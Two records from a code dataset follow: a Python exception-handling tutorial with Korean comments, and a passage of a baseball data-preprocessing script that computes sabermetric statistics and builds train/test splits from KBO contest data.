+{"seq_id":"525482875","text":"#파이썬 예외처리의 이해\n\n#예외 종류\n#문법적으로 에러가 없지만, 코드 실행(런타임)프로세스에서 발생하는 예외 처리도 중요\n#linter: 코드 스타일, 문법 체크\n\n#SyntaxError: 잘못된 문법 \n#print('Tes)\n# x=>y\n\n#NameError : 참조변수가 없음\na = 10\nb = 15\n\n#print(c)\n\n#ZeoDivisionError : 0 나누기에러\n#print(10 / 0)\n\n#IndexError: 인덱스 범위 오버\nx = [10, 20, 30]\nprint(x[0])\n#print(x[3]) #예외 발생\n\n#keyError\ndic = {\"name\":\"kim\", \"age\":\"33\",\"city\":\"seoul\"}\n\n#print(dic['hobby])\nprint(dic.get('hobby'))\n\n#AttributeError: 모듈, 클래스에 있는 잘못된 속성 사용시에 예외\n\nimport time\nprint(time.time())\n#print(time.month())\n\n#valueError : 참조값이 없을때 발생\nx = [1,5,9]\n\n#x.remove(10)\n#x.index(10)\n\n#FileNotFoundError\n#f = open('text.txt',r) #예외발생\n\n#TypeError\n\nx = [1,2]\ny = (1,2)\nz = \"test\"\n#print(x + y ) #예외 결합 불가능\n\n#항상 예외가 발생하지 않을 것으로 가정하고 먼저 코딩\n#그 후 런타임 예외 발생시 예외처리 코딩 권장 (EAFP 코딩 스타일)\n\n#예외 처리 기본\n#try: 에러가 발생할 가능성이 있는 코드 실행\n#except: 예러명1\n#except: 예러명2\n#else : 에러가 발생하지 않았을 경우 실행\n#finally: 항상 실행\n\n#예제1\n\nname = ['kim', 'Lee', 'Park']\n\ntry: \n z = \"kim\"\n x = name.index(z)\n print('{} Found it! in name' .format(z,x+1))\nexcept ValueError: #어떤에러가 발생했는지 모를때 except:\n print('Not found it! - Occurred ValueError!')\nelse:\n print(\"okay! else!\")\nfinally:\n print(\"finally ok\")\n\n#예제4\n#예외 처리는 하지 않지만, 무조건 수행되는 코당 패턴\ntry: \n z = \"kim\"\nfinally:\n print(\"kim 실행\")\n\n#예제5\ntry:\n z = \"kim\"\n x = name.index(z)\n print('{} Found it! in name' .format(z, x+1))\nexcept ValueError as l: # alias l \n print(l)\nexcept IndexError:\n print(\"IndexError\")\nexcept Exception:\n print(\"Exception\")\nelse: \n print(\"OK! else!\")\nfinally:\n print(\"finally OK!\")\n\n#예제6\n#예외 발생 : raise\n#raise 키워드로 예외 직접 발생\n\ntry:\n a = \"Kim\"\n if a == \"kim\":\n print('Ok 허가!')\n else:\n raise ValueError #예외를 직접 만들때, \nexcept ValueError:\n print('문제발생')\nexcept Exception as f:\n print(f)\nelse:\n print(\"OK!\")","sub_path":"resource/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"13118437","text":"import pandas as pd\nimport numpy as np\nimport warnings\nfrom sklearn.preprocessing import StandardScaler\nwarnings.filterwarnings('ignore')\nfrom sklearn.cluster import KMeans\n\ndef rawdata_preprocess():\n # loading raw data\n indiv_hit_16 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2016.csv', encoding='cp949')\n indiv_hit_17 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2017.csv', encoding='cp949')\n indiv_hit_18 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2018.csv', encoding='cp949')\n indiv_hit_19 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2019.csv', encoding='cp949')\n indiv_hit_20 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2020.csv', encoding='cp949')\n indiv_pit_16 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인투수_2016.csv', encoding='cp949')\n indiv_pit_17 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인투수_2017.csv', encoding='cp949')\n indiv_pit_18 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인투수_2018.csv', encoding='cp949')\n indiv_pit_19 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인투수_2019.csv', encoding='cp949')\n indiv_pit_20 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인투수_2020.csv', encoding='cp949')\n\n team_hit_16 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀타자_2016.csv', encoding='cp949')\n team_hit_17 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀타자_2017.csv', encoding='cp949')\n team_hit_18 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀타자_2018.csv', encoding='cp949')\n team_hit_19 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀타자_2019.csv', encoding='cp949')\n team_hit_20 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀타자_2020.csv', encoding='cp949')\n team_pit_16 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀투수_2016.csv', encoding='cp949')\n team_pit_17 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀투수_2017.csv', encoding='cp949')\n team_pit_18 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀투수_2018.csv', encoding='cp949')\n team_pit_19 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀투수_2019.csv', encoding='cp949')\n team_pit_20 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀투수_2020.csv', encoding='cp949')\n\n # load crawling data\n cr_ind_hit = pd.read_csv('./data/crawling/crawl_ind_h.csv', encoding='cp949')\n cr_ind_pit = pd.read_csv('./data/crawling/crawl_ind_p.csv', encoding='cp949')\n cr_team_hit = pd.read_csv('./data/crawling/crawl_team_h.csv', encoding='cp949')\n cr_team_pit = pd.read_csv('./data/crawling/crawl_team_p.csv', encoding='cp949')\n\n\n # concat by theirselves\n indiv_pit = pd.concat([indiv_pit_16, indiv_pit_17, indiv_pit_18, indiv_pit_19, indiv_pit_20])\n indiv_hit = pd.concat([indiv_hit_16, indiv_hit_17, indiv_hit_18, indiv_hit_19, indiv_hit_20])\n team_hit = pd.concat([team_hit_16, team_hit_17, team_hit_18, team_hit_19, team_hit_20])\n team_pit = pd.concat([team_pit_16, team_pit_17, team_pit_18, team_pit_19, team_pit_20])\n\n # sum BB+IB+HP\n indiv_pit['BB'] = indiv_pit['BB'] + indiv_pit['IB'] + indiv_pit['HP']\n indiv_hit['BB'] = indiv_hit['BB'] + indiv_hit['IB'] + indiv_hit['HP']\n team_pit['BB'] = team_pit['BB'] + team_pit['IB'] + team_pit['HP']\n team_hit['BB'] = team_hit['BB'] + team_hit['IB'] + team_hit['HP']\n\n # sum HIT+H2+H3\n indiv_pit['HIT'] = indiv_pit['HIT'] + indiv_pit['H2'] + indiv_pit['H3']\n\n # concat all_data with crawling data\n indiv_pit_all = pd.concat([indiv_pit[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'P_ID', 'START_CK',\n 'RELIEF_CK', 'INN2', 'BF', 'PA', 'AB', 'HIT', 'HR', 'KK', 'BB', 'R',\n 'ER']],\n cr_ind_pit[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'P_ID', 'START_CK',\n 'RELIEF_CK', 'INN2', 'BF', 'PA', 'AB', 'HIT', 'HR', 'KK', 'BB', 'R',\n 'ER']]])\n\n indiv_hit_all = pd.concat([indiv_hit[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'P_ID', 'AB', 'RBI',\n 'RUN', 'HIT', 'H2', 'H3', 'HR', 'BB', 'KK']], cr_ind_hit])\n\n team_hit_all = pd.concat([team_hit[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'AB', 'RBI', 'RUN',\n 'HIT', 'H2', 'H3', 'HR', 'SB', 'BB', 'KK', 'GD', 'ERR', 'LOB']], cr_team_hit])\n\n team_pit_all = pd.concat([team_pit[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'WLS', 'INN2', 'BF',\n 'AB', 'HIT', 'H2', 'H3', 'HR', 'SB', 'BB', 'KK', 'GD', 'R', 'ER']],\n cr_team_pit])\n\n indiv_pit_all = indiv_pit_all[indiv_pit_all['P_ID'] != 'No_Code']\n indiv_pit_all['P_ID'] = indiv_pit_all['P_ID'].astype('int64')\n indiv_hit_all = indiv_hit_all[indiv_hit_all['P_ID'] != 'No_Code']\n indiv_hit_all['P_ID'] = indiv_hit_all['P_ID'].astype('int64')\n team_pit_all['WLS_changed'] = team_pit_all['WLS'].apply(lambda x: 1 if x=='W' else 0)\n\n return indiv_pit_all, indiv_hit_all, team_hit_all, team_pit_all\n\n\ndef add_and_concat(ind_pit, team_pit, team_hit):\n pitcher_start = ind_pit[ind_pit['START_CK'] == 1].reset_index(drop=True)\n pitcher_start = pitcher_start[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'INN2', 'ER']]\n pitcher_team_all = pd.merge(team_pit, pitcher_start, how='inner',\n on=['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC'],\n suffixes=('_teampit', '_sp'))\n\n team_all = pd.merge(pitcher_team_all, team_hit, how='inner',\n on=['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC'],\n suffixes=('_pit', '_bat'))\n\n return team_all\n\n\ndef saber_stats(series):\n series['ERA'] = (series['ER_teampit'] / (series['INN2_teampit'] / 3)) * 9\n\n series['AVG_bat'] = series['HIT_bat'] / series['AB_bat']\n series['AVG_pit'] = series['HIT_pit'] / series['AB_pit']\n\n series['OPS_bat'] = ((series['HIT_bat'] + series['BB_bat'] + (\n (series['HIT_bat'] - series['H2_bat'] - series['H3_bat'] - series['HR_bat'])\n + (series['H2_bat'] * 2) + (series['H3_bat'] * 3) + (series['HR_bat'] * 4)))) / series['AB_bat']\n\n series['OPS_pit'] = ((series['HIT_pit'] + series['BB_pit'] + (\n (series['HIT_pit'] - series['H2_pit'] - series['H3_pit'] - series['HR_pit'])\n + (series['H2_pit'] * 2) + (series['H3_pit'] * 3) + (series['HR_pit'] * 4)))) / series['AB_pit']\n\n series['wOBA_bat'] = ((0.69 * (series['BB_bat']))\n + (0.89 * (series['HIT_bat'] - series['H2_bat'] - series['H3_bat'] - series['HR_bat']))\n + (1.27 * series['H2_bat'])\n + (1.62 * series['H3_bat'])\n + (2.1 * series['HR_bat'])) / (series['AB_bat'] + series['BB_bat'])\n\n series['wOBA_pit'] = ((0.69 * (series['BB_pit']))\n + (0.89 * (series['HIT_pit'] - series['H2_pit'] - series['H3_pit'] - series['HR_pit']))\n + (1.27 * series['H2_pit'])\n + (1.62 * series['H3_pit'])\n + (2.1 * series['HR_pit'])) / (series['AB_pit'] + series['BB_pit'])\n\n series['FIP'] = (((-2 * series['KK_pit']) + (3 * (series['BB_pit'])) + (13 * series['HR_pit']))\n / (series['INN2_teampit'] / 3)) + 3.0\n\n series['WHIP'] = (series['HIT_pit'] + series['BB_pit']) / (series['INN2_teampit'] / 3)\n\n series['ISO'] = (series['H2_bat'] + (2 * series['H3_bat']) + (3 * series['HR_bat'])) / series['AB_bat']\n series['PE'] = (series['RUN'] ** 2) / ((series['RUN'] ** 2) + (series['R'] ** 2))\n return series\n\ndef rel_w_rate(data):\n new = [['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'wins', 'loses']]\n for k in ['LG', 'OB', 'SS', 'HH', 'HT', 'WO', 'KT', 'SK', 'LT', 'NC']:\n for j in ['LG', 'OB', 'SS', 'HH', 'HT', 'WO', 'KT', 'SK', 'LT', 'NC']:\n if k == j:\n continue\n for i in range(len(data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)])):\n if i == 0:\n new.append([data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i].G_ID,\n data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i,].GDAY_DS, \\\n k, j, 0, 0])\n\n elif 0 < i < 5:\n win = list(data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[:i].WLS.values).count('W')\n lose = list(data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[:i].WLS.values).count('L')\n new.append([data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i].G_ID,\n data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i].GDAY_DS, \\\n k, j, win, lose])\n\n else:\n new.append([data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i].G_ID,\n data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i].GDAY_DS, \\\n k, j, \\\n list(data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i - 5:i].WLS.values).count(\n 'W'), \\\n list(data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i - 5:i].WLS.values).count(\n 'L')])\n return pd.DataFrame(new[1:], columns=new[0])\n\ndef count_of_avg_3(data):\n batter = data[:]\n player_list = list(batter['P_ID'].unique())\n batter = batter[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'P_ID', 'AB', 'HIT']]\n make = pd.DataFrame(columns=['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'P_ID', 'AB', 'HIT', 'cum_AB', 'cum_HIT', 'AVG'])\n for i in player_list:\n player = batter[batter['P_ID'] == i]\n player['cum_AB'] = player['AB'].cumsum()\n player['cum_HIT'] = player['HIT'].cumsum()\n player['AVG'] = player['cum_HIT'] / player['cum_AB']\n make = pd.concat([make, player])\n\n make['AVG'] = make['AVG'].fillna(0)\n\n team_3hal = pd.DataFrame(columns=['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', '3hal'])\n for t in ['NC', 'LT', 'OB', 'SK', 'SS', 'HT', 'HH', 'WO', 'KT', 'LG']:\n temp = [['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', '3hal']]\n for j in list(make[make['T_ID'] == t].G_ID.unique()):\n ttemp = [j, make[make['G_ID'] == j].GDAY_DS.unique()[0], t,\n make[(make['G_ID'] == j) & (make['T_ID'] == t)].VS_T_ID.unique()[0]]\n ttemp.append(len(make[(make['G_ID'] == j) & (make['AVG'] >= 0.3) & (make['T_ID'] == t)]))\n temp.append(ttemp)\n temp = pd.DataFrame(temp[1:], columns=temp[0])\n team_3hal = pd.concat([team_3hal, temp])\n return team_3hal\n\ndef money():\n #load data\n sal_2016 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2016.csv', encoding='cp949').dropna()\n sal_2017 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2017.csv', encoding='cp949').dropna()\n sal_2018 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2018.csv', encoding='cp949').dropna()\n sal_2019 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2019.csv', encoding='cp949').dropna()\n sal_2020 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2020.csv', encoding='cp949').dropna()\n\n\n absal_2016 = sal_2016['MONEY'].str.slice(0,-2).astype(int)\n pcode_2016 = sal_2016[['PCODE','T_ID']]\n result_2016 = pd.concat([pcode_2016,absal_2016], axis=1)\n\n absal_2017 = sal_2017['MONEY'].str.slice(0,-2).astype(int)\n pcode_2017 = sal_2017[['PCODE','T_ID']]\n result_2017 = pd.concat([pcode_2017,absal_2017], axis=1)\n\n absal_2018 = sal_2018['MONEY'].str.slice(0,-2).astype(int)\n pcode_2018 = sal_2018[['PCODE','T_ID']]\n result_2018 = pd.concat([pcode_2018,absal_2018], axis=1)\n\n absal_2019 = sal_2019['MONEY'].str.slice(0,-2).astype(int)\n pcode_2019 = sal_2019[['PCODE','T_ID']]\n result_2019 = pd.concat([pcode_2019,absal_2019], axis=1)\n\n absal_2020 = sal_2020['MONEY'].str.slice(0,-2).astype(int)\n pcode_2020 = sal_2020[['PCODE','T_ID']]\n result_2020 = pd.concat([pcode_2020,absal_2020], axis=1)\n\n data_17 = pd.merge(result_2016,result_2017, on ='PCODE', suffixes =('_2016','_2017')).dropna()\n data_17['fluctuation'] = data_17['MONEY_2017']/data_17['MONEY_2016']\n data_18 = pd.merge(result_2017,result_2018, on ='PCODE', suffixes =('_2017','_2018')).dropna()\n data_18['fluctuation'] = data_18['MONEY_2018']/data_18['MONEY_2017']\n data_19 = pd.merge(result_2018,result_2019, on ='PCODE', suffixes =('_2018','_2019')).dropna()\n data_19['fluctuation'] = data_19['MONEY_2019']/data_19['MONEY_2018']\n data_20 = pd.merge(result_2019,result_2020, on ='PCODE', suffixes =('_2019','_2020')).dropna()\n data_20['fluctuation'] = data_20['MONEY_2020']/data_20['MONEY_2019']\n\n df17 = pd.DataFrame(data_17.groupby('T_ID_2017')['fluctuation'].mean()).reset_index()\n df18 = pd.DataFrame(data_18.groupby('T_ID_2018')['fluctuation'].mean()).reset_index()\n df19 = pd.DataFrame(data_19.groupby('T_ID_2019')['fluctuation'].mean()).reset_index()\n df20 = pd.DataFrame(data_20.groupby('T_ID_2020')['fluctuation'].mean()).reset_index()\n\n jsn2017 = dict()\n jsn2018 = dict()\n jsn2019 = dict()\n jsn2020 = dict()\n\n for i in np.array(df17):\n jsn2017[i[0]] = i[1]\n\n for i in np.array(df18):\n jsn2018[i[0]] = i[1]\n\n for i in np.array(df19):\n jsn2019[i[0]] = i[1]\n\n for i in np.array(df20):\n jsn2020[i[0]] = i[1]\n return jsn2017, jsn2018, jsn2019, jsn2020\n\ndef kmeans():\n players = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2020.csv', encoding='cp949').dropna()\n indiv_hit_18 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2018.csv', encoding='cp949')\n indiv_hit_19 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2019.csv', encoding='cp949')\n indiv_hit_20 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2020.csv', encoding='cp949')\n frame = [indiv_hit_18, indiv_hit_19, indiv_hit_20]\n batter_ind_all = pd.concat(frame).reset_index().drop('index', axis=1)\n players = players[['PCODE', 'NAME']]\n players.rename(columns={'PCODE': 'P_ID'}, inplace=True)\n players.drop_duplicates(subset=\"P_ID\", inplace=True)\n batter_ind_all = batter_ind_all[['P_ID','START_CK', 'BAT_ORDER_NO', 'PA', 'AB', 'RBI', 'RUN', 'HIT', 'H2', 'H3','HR', 'SB', 'CS', 'SH', 'SF', 'BB', 'IB', 'HP', 'KK', 'GD', 'ERR',\n 'LOB', 'P_HRA_RT', 'P_AB_CN', 'P_HIT_CN']]\n df = pd.DataFrame(batter_ind_all.groupby('P_ID')[['PA', 'START_CK', 'AB', 'RBI', 'RUN', 'HIT', 'H2', 'H3',\n 'HR', 'SB', 'CS', 'SH', 'SF', 'BB', 'IB', 'HP', 'KK', 'GD',\n 'ERR']].apply(sum))\n df = df[df['PA'] >= 900]\n df = df.apply(lambda x: create_saber_stats_for_Kmeans(x), axis=1)\n df['BB'] = df.apply(lambda x: x.BB + x.IB + x.HP, axis=1)\n df = df.drop(['IB', 'HP'], axis=1)\n df['START_PA'] = df.apply(lambda x: x.START_CK / x.PA, axis=1) # 스타팅으로 출전하는 빈도\n df['SB_attempt'] = df.apply(lambda x: (x.SB + x.CS) / (x.HIT - x.H2 - x.H3 - x.HR + x.BB), axis=1) # 1루 진출 시 도루 시도\n df.loc[:, 'RBI':'ERR'] = df.loc[:, 'RBI':'ERR'].div(df.PA, axis=0)\n\n df_kmeans = df[['AVG', 'ISO', 'HR_HIT', 'PA_BB', 'SB_attempt']]\n X = df_kmeans.values\n\n scaler = StandardScaler()\n X_std = scaler.fit_transform(X)\n kmeans = KMeans(n_clusters=5, max_iter=30, random_state=0)\n pred = kmeans.fit_predict(X_std)\n df['type'] = pred\n df.reset_index(inplace=True)\n df_new = pd.merge(df, players, how='inner', on='P_ID')\n return df_new\n\ndef create_saber_stats_for_Kmeans(row):\n row['AVG'] = row.HIT / row.AB # 타율\n\n row['OPS'] = ((row.HIT + row.BB + row.HP) + ((row.HIT - row.H2 - row.H3 - row.HR)\n + (row.H2 * 2) + (row.H3 * 3) + (row.HR * 4))) / row.AB\n\n row['wOBA'] = ((0.69 * (row.BB - row.IB)) + (0.72 * row.HP) + (0.89 * (row.HIT - row.H2 - row.H3 - row.HR))\n + (1.27 * row.H2) + (1.62 * row.H3) + (2.1 * row.HR)) / (row.AB + row.BB - row.IB + row.SF + row.HP)\n\n row['ISO'] = (row.H2 + (2 * row.H3) + (3 * row.HR)) / row.AB # 타자의 파워\n\n row['PA_BB'] = row.PA / (row.BB + row.IB + row.HP) # 단위 볼넷 당 타석 수\n\n row['HR_HIT'] = row.HR / row.HIT # 단위 안타 당 홈런 개수\n return row\n\n\ndef foriegn_players():\n pitcher16 = pd.read_csv('./data_csv/pitcher/pitcher2016.csv', encoding='cp949')\n pitcher17 = pd.read_csv('./data_csv/pitcher/pitcher2017.csv', encoding='cp949')\n pitcher18 = pd.read_csv('./data_csv/pitcher/pitcher2018.csv', encoding='cp949')\n pitcher19 = pd.read_csv('./data_csv/pitcher/pitcher2019.csv', encoding='cp949')\n hitter16 = pd.read_csv('./data_csv/hitter/hitter2016.csv', encoding='cp949')\n hitter17 = pd.read_csv('./data_csv/hitter/hitter2017.csv', encoding='cp949')\n hitter18 = pd.read_csv('./data_csv/hitter/hitter2018.csv', encoding='cp949')\n hitter19 = pd.read_csv('./data_csv/hitter/hitter2019.csv', encoding='cp949')\n pitcher20 = pd.read_csv('./data_csv/2020_ind_pit.csv')\n hitter20 = pd.read_csv('./data_csv/2020_ind_hit.csv')\n pitcher20 = pitcher20[pitcher20['P_ID'] != 'No_Code']\n hitter20 = hitter20[hitter20['P_ID'] != 'No_Code']\n pitcher20['P_ID'] = pitcher20['P_ID'].astype('int')\n hitter20['P_ID'] = hitter20['P_ID'].astype('int')\n\n # 외국인 명단\n pit16 = {'WO': [65331, 62322, 66323, 66324], 'OB': [61240, 66226], 'LT': [65543, 65546],\n 'SS': [66402, 66423, 66440, 66446], 'HH': [66748, 66750, 65742, 66742], \\\n 'HT': [66643, 66628], 'KT': [67845, 66032, 65331, 66049, 66050], 'LG': [66154, 66138, 62698],\n 'NC': [65931, 63938], 'SK': [63810, 66825, 65856]}\n hit16 = {'WO': [66306], 'OB': [66244], 'LT': [65523, 66523], 'SS': [66452], 'HH': [66740], 'HT': [64699],\n 'KT': [65005], \\\n 'LG': [65103], 'NC': [64914], 'SK': [66805]}\n\n pit17 = {'WO': [67312, 67313, 62322], 'OB': [61240, 66226], 'LT': [67559, 65546, 65543], 'SS': [67423, 67435],\n 'HH': [67748, 67742], \\\n 'HT': [67645, 66643], 'KT': [67033, 65331], 'LG': [66138, 62698], 'NC': [67948, 63938],\n 'SK': [65856, 67815]}\n hit17 = {'WO': [66306, 67394], 'OB': [66244], 'LT': [67598], 'SS': [67450], 'HH': [66740], 'HT': [67650],\n 'KT': [67024, 67025], \\\n 'LG': [65103, 67134], 'NC': [67935], 'SK': [67827, 67872]}\n\n pit18 = {'WO': [65742, 63938, 67313], 'OB': [65543, 68240], 'LT': [65546, 68526], 'SS': [68435, 68400],\n 'HH': [68748, 68742, 68794], \\\n 'HT': [67645, 66643], 'KT': [65331, 61240], 'LG': [62698, 68135], 'NC': [68953, 68948],\n 'SK': [65856, 68815]}\n hit18 = {'WO': [67394, 68345], 'OB': [68244, 68245], 'LT': [67598], 'SS': [67450], 'HH': [68730], 'HT': [67650],\n 'KT': [67025], \\\n 'LG': [68103], 'NC': [67935], 'SK': [67872]}\n\n pit19 = {'WO': [67313, 69343], 'OB': [65543, 68240], 'LT': [65546, 69550], 'SS': [69435, 69439, 69413],\n 'HH': [69744, 69748], \\\n 'HT': [69640, 69656], 'KT': [69045, 69032], 'LG': [69103, 68135], 'NC': [69940, 69934, 69953],\n 'SK': [69861, 62698, 68815]}\n hit19 = {'WO': [68345], 'OB': [69209], 'LT': [69530, 69569], 'SS': [67450], 'HH': [68730], 'HT': [69605, 69652],\n 'KT': [67025], \\\n 'LG': [69150, 69165], 'NC': [69950, 69901], 'SK': [67872]}\n\n pit20 = {'WO': [67313, 69343], 'OB': [50234, 69045], 'LT': [50558, 50524], 'SS': [69439, 50404],\n 'HH': [69744, 69748], \\\n 'HT': [50636, 50640], 'KT': [69032, 50040], 'LG': [69103, 68135], 'NC': [69940, 50912],\n 'SK': [50815, 50835]}\n hit20 = {'WO': [50300, 99998], 'OB': [69209], 'LT': [50506], 'SS': [50468, 99999], 'HH': [68730, 50730],\n 'HT': [69652], 'KT': [67025], \\\n 'LG': [50165], 'NC': [50923], 'SK': [67872, 99997]}\n\n # 16년도 외국인 용병 수치 구하기 (투수)- 17, 18, 19, 20년도 숫자만 바꿔주면 가능\n dt = [['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'FR_INN2', 'FR_ER']]\n for j in ['NC', 'LG', 'WO', 'HH', 'HT', 'SK', 'KT', 'OB', 'LT', 'SS']:\n for i in list(pitcher16[pitcher16['T_ID'] == j].G_ID.unique()):\n if len(pitcher16[(pitcher16.G_ID == i) & pitcher16.P_ID.isin(pit16[j])]):\n ER = pitcher16[(pitcher16.G_ID == i) & pitcher16.P_ID.isin(pit16[j])].ER.sum()\n INN = pitcher16[(pitcher16.G_ID == i) & pitcher16.P_ID.isin(pit16[j])].INN2.sum()\n else:\n ER = 0\n INN = 0\n dt.append(\n [pitcher16[(pitcher16.G_ID == i)].G_ID.values[0], pitcher16[(pitcher16.G_ID == i)].GDAY_DS.values[0], \\\n j, pitcher16[(pitcher16.G_ID == i) & (pitcher16.T_ID == j)].VS_T_ID.values[0], INN, ER])\n dt_16 = pd.DataFrame(dt[1:], columns=dt[0])\n dt_16.sort_values(by=['T_ID', 'GDAY_DS']).to_csv('./data/result/fr_pit_2016.csv', index=False)\n\n # 16년도 외국인 용병 수치 구하기 (타자) - 17, 18, 19, 20년도 숫자만 바꿔주면 가능\n df = [['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'FR_AB', 'FR_HIT', 'FR_H2', 'FR_H3', 'FR_HR']]\n\n for j in ['NC', 'LG', 'WO', 'HH', 'HT', 'SK', 'KT', 'OB', 'LT', 'SS']:\n for i in list(hitter16[hitter16['T_ID'] == j].G_ID.unique()):\n if len(hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])]):\n AB = hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])].AB.sum()\n HIT = hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])].HIT.sum()\n H2 = hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])].H2.sum()\n H3 = hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])].H3.sum()\n HR = hitter16[(hitter16.G_ID == i) & hitter16.P_ID.isin(hit16[j])].HR.sum()\n else:\n AB = 0\n HIT = 0\n H2 = 0\n H3 = 0\n HR = 0\n df.append([hitter16[(hitter16.G_ID == i)].G_ID.values[0], hitter16[(hitter16.G_ID == i)].GDAY_DS.values[0], \\\n j, hitter16[(hitter16.G_ID == i) & (hitter16.T_ID == j)].VS_T_ID.values[0], AB, \\\n HIT, H2, H3, HR])\n df_16 = pd.DataFrame(df[1:], columns=df[0])\n df_16.sort_values(by=['T_ID', 'GDAY_DS']).to_csv('fr_hit_2016.csv', index=False)\n\n\n\ndef train_test_split(team_data, team_three):\n team_merge = pd.merge(team_data, team_three, on=['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID'], how='left')\n team_merge = team_merge.sort_values(by=['T_ID', 'G_ID'])\n team_train = pd.DataFrame(columns=team_merge.columns)\n team_test = pd.DataFrame(columns=team_merge.columns)\n for i in ['NC', 'KT', 'WO', 'LT', 'SK', 'SS', 'HT', 'HH', 'OB', 'LG']:\n team_train = pd.concat([team_train, team_merge[team_merge['T_ID'] == i].iloc[:-26].sort_values(by='G_ID')])\n team_test = pd.concat([team_test, team_merge[team_merge['T_ID'] == i].iloc[-1:-27:-1].sort_values(by='G_ID')])\n return team_train, team_test\n\n\n\ndef main():\n indiv_pit_all, indiv_hit_all, team_hit_all, team_pit_all = rawdata_preprocess()\n\n team_all = add_and_concat(indiv_pit_all, team_pit_all, team_hit_all)\n team_saber_all = saber_stats(team_all)\n\n # add_rel = rel_w_rate(team_saber_all) # 상대전적 구하는 함수인데 성능에 안 좋은 영향을 주어 안 썼습니다.\n # div_kmeans = kmeans() # 선수들의 유형을 군집화하는 함수인데 성능이 약간 낮아져 안썼습니다.\n # foriegn_players() # 외국인 선수들의 각 경기별 지표인데, 좋은 활용방안을 못 찾아 최종으로 쓰지 않았습니다.\n # sal17, sal18, sal19, sal20 = money() # 팀마다의 연봉 상승률을 고려하여 제작했지만, 성능에 궁정적 영향을 주지않아 사용하지 않았습니다.\n\n\n team_3hal = count_of_avg_3(indiv_hit_all)\n train_data, test_data = train_test_split(team_saber_all, team_3hal)\n train_data.to_csv('./data/result/train_data.csv', index=False)\n test_data.to_csv('./data/result/test_data.csv', index=False)\n\nif __name__ == '__main__':\n 